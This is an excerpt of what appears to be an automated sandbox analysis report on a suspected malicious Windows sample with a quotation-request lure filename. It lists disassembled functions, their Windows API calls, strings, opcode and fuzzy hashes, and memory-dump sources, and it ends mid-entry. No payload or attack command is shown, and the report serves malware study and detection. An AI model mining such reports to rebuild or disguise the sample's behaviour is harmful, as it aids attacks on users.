                                                        • Opcode ID: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                        • Opcode Fuzzy Hash: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                        Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateDestroy
                                                        • String ID: ,$tooltips_class32
                                                        • API String ID: 1109047481-3856767331
                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                        Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                        • String ID: 0
                                                        • API String ID: 1441871840-4108050209
                                                        • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                        • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                        Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                        • __swprintf.LIBCMT ref: 00460915
                                                        • __swprintf.LIBCMT ref: 0046092D
                                                        • _wprintf.LIBCMT ref: 004609E1
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 3631882475-2268648507
                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                        Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                        • SendMessageW.USER32 ref: 00471740
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                        • SendMessageW.USER32 ref: 0047184F
                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                        • String ID:
                                                        • API String ID: 4116747274-0
                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                        Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                        • _wcslen.LIBCMT ref: 00461683
                                                        • __swprintf.LIBCMT ref: 00461721
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                                        • GetParent.USER32(?), ref: 004618C3
                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                        • String ID: %s%u
                                                        • API String ID: 1899580136-679674701
                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                        Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu$Sleep
                                                        • String ID: 0
                                                        • API String ID: 1196289194-4108050209
                                                        • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                        • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                        Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                        • String ID: (
                                                        • API String ID: 3300687185-3887548279
                                                        • Opcode ID: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                        • Opcode Fuzzy Hash: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                        Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 1976180769-4113822522
                                                        • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                        • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                        • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                        • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                        Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                        • String ID:
                                                        • API String ID: 461458858-0
                                                        • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                        • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                        • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                        • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                        Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                        • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                        • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                        • DeleteObject.GDI32(?), ref: 004301D0
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3969911579-0
                                                        • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                        • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                        • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                        • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                        Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                        • String ID: 0
                                                        • API String ID: 956284711-4108050209
                                                        • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                        • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                        • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                        • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                        Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 1965227024-3771769585
                                                        • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                        • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                        • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                        • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                        Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
